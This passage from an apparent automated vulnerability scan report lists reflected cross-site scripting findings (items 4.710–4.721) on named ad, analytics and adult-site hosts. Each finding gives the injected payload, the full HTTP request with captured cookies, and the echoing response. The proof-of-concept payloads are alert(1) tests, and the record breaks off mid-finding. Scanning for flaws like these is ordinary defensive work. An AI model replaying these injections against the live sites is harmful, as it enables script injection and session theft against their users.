Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com466bc"><script>alert(1)</script>0c124ef56d7/video/1[randomNo]/1667684471/x90]]/default/empty.gif/72634857383031444f386b4144567663?x" target="_top">
...[SNIP]...

4.710. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]] [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]]

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f667a"><script>alert(1)</script>b183b6c26c2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/videof667a"><script>alert(1)</script>b183b6c26c2/1[randomNo]@x90]] HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:09:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 369
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/videof667a"><script>alert(1)</script>b183b6c26c2/1[randomNo]/1897051802/x90]]/default/empty.gif/72634857383031444f386b4144567663?x" target="_top">
...[SNIP]...

4.711. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]] [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]]

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99d8a"><script>alert(1)</script>56928d72bf6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]]99d8a"><script>alert(1)</script>56928d72bf6 HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:09:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 369
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/video/1[randomNo]/2028974632/x90]]99d8a"><script>alert(1)</script>56928d72bf6/default/empty.gif/72634857383031444f386b4144567663?x" target="_top">
...[SNIP]...

4.712. http://onset.freedom.com/fi/analytics/cms/ [ctype parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://onset.freedom.com
Path:	/fi/analytics/cms/

Issue detail

The value of the ctype request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bfbb"%3balert(1)//0c99605c03e was submitted in the ctype parameter. This input was echoed as 6bfbb";alert(1)//0c99605c03e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section6bfbb"%3balert(1)//0c99605c03e&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C HTTP/1.1
Host: onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:50:05 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Expires: Sat, 29 Jan 2011 03:50:05 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 28740

var fiChildSAccount="fiwrgb";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */
/*****
...[SNIP]...
_c2f(c);return s(un,pg,ss)}

s.pageName="events.cbs6albany.com: zvents";
s.server="events.cbs6albany.com";
s.channel="entertainment";
s.pageType="";s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="section6bfbb";alert(1)//0c99605c03e";
s.prop5="entertainment|events|events";
s.prop6="";
s.prop7="";
s.prop8=""
s.prop9="";
s.prop10="";
s.prop11="";s.prop12="";
s.prop13="";
s.prop14=""
s.prop15="";s.prop16="";
s.prop17="";
s.prop18=""
...[SNIP]...

4.713. http://onset.freedom.com/fi/analytics/cms/ [domain parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://onset.freedom.com
Path:	/fi/analytics/cms/

Issue detail

The value of the domain request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab9fb"%3balert(1)//cd97779d75a was submitted in the domain parameter. This input was echoed as ab9fb";alert(1)//cd97779d75a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.comab9fb"%3balert(1)//cd97779d75a&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C HTTP/1.1
Host: onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:50:01 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Expires: Sat, 29 Jan 2011 03:50:01 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 28923

var fiChildSAccount="fiwrgb";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */
/*****
...[SNIP]...
<0){eval(c);return new
s_c(un,pg,ss)}else s=s_c2f(c);return s(un,pg,ss)}

s.pageName="events.cbs6albany.comab9fb";alert(1)//cd97779d75a: entertainment section front";
s.server="events.cbs6albany.comab9fb";alert(1)//cd97779d75a";
s.channel="entertainment";
s.pageType="";s.prop1="";
s.prop2="events.cbs6albany.comab9fb";alert(1)//cd97779
...[SNIP]...

4.714. http://onset.freedom.com/fi/analytics/cms/ [domain parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://onset.freedom.com
Path:	/fi/analytics/cms/

Issue detail

The value of the domain request parameter is copied into a JavaScript inline comment. The payload 9a661*/alert(1)//133025af296 was submitted in the domain parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com9a661*/alert(1)//133025af296&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C HTTP/1.1
Host: onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:50:02 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Expires: Sat, 29 Jan 2011 03:50:02 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 28923

var fiChildSAccount="fiwrgb";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */
/*****
...[SNIP]...
+ s.pageName;
s.prop44="17:50";
s.eVar6="";
s.hier1="entertainment|root";
s.hier2="events.cbs6albany.com9a661*/alert(1)//133025af296|entertainment|events|events|root";
/** domain=events.cbs6albany.com9a661*/alert(1)//133025af296 **/

/** referer=http://events.cbs6albany.com/?376e5%22%3e%3cscript%3ealert(1)%3c/script%3ea7771aeaee3=1 **/
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(
...[SNIP]...

4.715. http://pixel.invitemedia.com/rubicon_sync [publisher_redirecturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/rubicon_sync

Issue detail

The value of the publisher_redirecturl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0717"><script>alert(1)</script>37c84a60207 was submitted in the publisher_redirecturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rubicon_sync?publisher_user_id=004826d0e57cb7385266145a629ee0301cc82296&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/a0717"><script>alert(1)</script>37c84a60207 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid="eyI0IjpbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsNzM0MTUxXX0="; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]}"; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]}"; subID="{}"; dp_rec="{\"3\": 1296072684+ \"2\": 1295634039}"; segments="3391|3392|11262|11265|17277|38781|38582,1298044270|10102"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Fri, 28 Jan 2011 16:59:36 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Fri, 28-Jan-2011 16:59:16 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 264

<html><body><img width="0" height="0" src="http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/a0717"><script>alert(1)</script>37c84a60207?publisher_dsp_id=2101&external_user_id=82d726c3-44ee-407c-85c4-39a0b0fc11ef&Expiration=1296665976"/>
...[SNIP]...

4.716. http://pu.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pu.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46447"><script>alert(1)</script>ca3e148e25e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?46447"><script>alert(1)</script>ca3e148e25e=1 HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=gxuklwm2wc54o44500sn3n55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gxuklwm2wc54o44500sn3n55; path=/; HttpOnly
Set-Cookie: spvdr=vd=d5599b14-175a-410b-9d97-113f02fc9ecd&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:21 GMT; path=/
Set-Cookie: ipu=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:21 GMT
Connection: close
Content-Length: 21862
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||46447"><script>alert(1)</script>ca3e148e25e~1');return false;">
...[SNIP]...

4.717. http://pu.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pu.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e39ce'-alert(1)-'10f765ebe49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?e39ce'-alert(1)-'10f765ebe49=1 HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=2ix2kvm0dkimmd45cjweuero; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2ix2kvm0dkimmd45cjweuero; path=/; HttpOnly
Set-Cookie: spvdr=vd=918cb142-ac05-44ff-b781-bebd10f67a21&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:22 GMT; path=/
Set-Cookie: ipu=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:21 GMT
Connection: close
Content-Length: 21461
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=pu.imlive.com&ul=/?e39ce'-alert(1)-'10f765ebe49=1&qs=e39ce'-alert(1)-'10f765ebe49=1&qs=e39ce'-alert(1)-'10f765ebe49=1&iy=dallas&id=44&iu=1&vd=918cb142-ac05-44ff-b781-bebd10f67a21';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.718. http://raw.oggifinogi.com/GetScript.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://raw.oggifinogi.com
Path:	/GetScript.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e463c'%3balert(1)//756d2af6207 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e463c';alert(1)//756d2af6207 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /GetScript.aspx?oggiId=8a1e14f9-0430-4899-bc31-63608f1bee92&oggiWidth=728px&oggiHeight=90px&oggiCampaignId=d12ec800-d902-472d-9d0d-8a77a14a4187&oggiVary=&oggiImpolite=true&oggiClickTrack=http://media.fastclick.net/w/click.here?cid=279384&mid=521626&m=1&sid=54393&c=0&tp=5&forced_click=&oggiIsIframe=1&oggiSite=http%3A//www.bostonherald.com/track/&e463c'%3balert(1)//756d2af6207=1 HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:55:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, precheck=0, max-age=0
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2113

function Init41ef5a71_ed69_49f0_8bd6_a345576a5df8(){
       var playerDiv = document.createElement("div");
       playerDiv.id = 'oggiPlayerDiv41ef5a71_ed69_49f0_8bd6_a345576a5df8';
       playerDiv.setAttribute(
...[SNIP]...
tp%3d5%26forced_click%3d%22%7d');
       playerDiv.setAttribute("impolite", 'true');
       playerDiv.setAttribute("expandedMode",'');
       playerDiv.setAttribute("referrer", 'http://www.bostonherald.com/track/&e463c';alert(1)//756d2af6207=1');window.isIframe = true;

       var absentBody = false;

       if (document.getElementsByTagName("head").length == 0){
           var head = document.createElement("head");
           var html = document.getElemen
...[SNIP]...

4.719. http://raw.oggifinogi.com/GetScript.aspx [oggiHeight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://raw.oggifinogi.com
Path:	/GetScript.aspx

Issue detail

The value of the oggiHeight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76eda"%3balert(1)//b92a78ddf85 was submitted in the oggiHeight parameter. This input was echoed as 76eda";alert(1)//b92a78ddf85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /GetScript.aspx?oggiId=92893396-e0b6-4c83-8a05-c0a43993b46b&oggiWidth=300px&oggiHeight=250px76eda"%3balert(1)//b92a78ddf85&oggiCampaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&oggiVary=&oggiImpolite=true&oggiClickTrack=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/k%3B232873271%3B0-0%3B1%3B44779888%3B4307-300/250%3B39460925/39478712/1%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3f&oggiSite=http%3A//www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc%3Dhome%26position%3D4 HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:52:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, precheck=0, max-age=0
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2706

function Init6f9aa2cb_5369_48aa_9a3f_33d9405a469a(){
       var playerDiv = document.createElement("div");
       playerDiv.id = 'oggiPlayerDiv6f9aa2cb_5369_48aa_9a3f_33d9405a469a';
       playerDiv.setAttribute(
...[SNIP]...
<div id='oggiPlaceholder6f9aa2cb_5369_48aa_9a3f_33d9405a469a' style='width:300px;height:250px76eda";alert(1)//b92a78ddf85;'>
...[SNIP]...

4.720. http://raw.oggifinogi.com/GetScript.aspx [oggiHeight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://raw.oggifinogi.com
Path:	/GetScript.aspx

Issue detail

The value of the oggiHeight request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54460'%3balert(1)//d2008572656 was submitted in the oggiHeight parameter. This input was echoed as 54460';alert(1)//d2008572656 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /GetScript.aspx?oggiId=92893396-e0b6-4c83-8a05-c0a43993b46b&oggiWidth=300px&oggiHeight=250px54460'%3balert(1)//d2008572656&oggiCampaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&oggiVary=&oggiImpolite=true&oggiClickTrack=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/k%3B232873271%3B0-0%3B1%3B44779888%3B4307-300/250%3B39460925/39478712/1%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3f&oggiSite=http%3A//www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc%3Dhome%26position%3D4 HTTP/1.1
Host: raw.oggifinogi.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:52:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, precheck=0, max-age=0
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2706

function Init690537d3_c9d1_419a_bd60_32f1f3fe5c8c(){
       var playerDiv = document.createElement("div");
       playerDiv.id = 'oggiPlayerDiv690537d3_c9d1_419a_bd60_32f1f3fe5c8c';
       playerDiv.setAttribute(
...[SNIP]...
/main.oggifinogi.com/OggiPlayerService/PlayerProxy.aspx?id=92893396-e0b6-4c83-8a05-c0a43993b46b&campaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef');
       playerDiv.style.cssText = 'width:300px;height:250px54460';alert(1)//d2008572656; position:absolute;text-align:left;';
       playerDiv.setAttribute("vary", '');
       playerDiv.setAttribute("gExternal", '%7b%22link1%22%3a%22http%3a%2f%2fwww.bestbuybusiness.com%2fbbfb%2fen%2fUS%2fadirect
...[SNIP]...

4.721. http://raw.oggifinogi.com/GetScript.aspx [oggiImpolite parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://raw.oggifinogi.com
Path:	/GetScript.aspx

Issue detail

The value of the oggiImpolite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6405c'%3balert(1)//18d1dd4323b was submitted in the oggiImpolite parameter. This input was echoed as 6405c';alert(1)//18d1dd4323b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

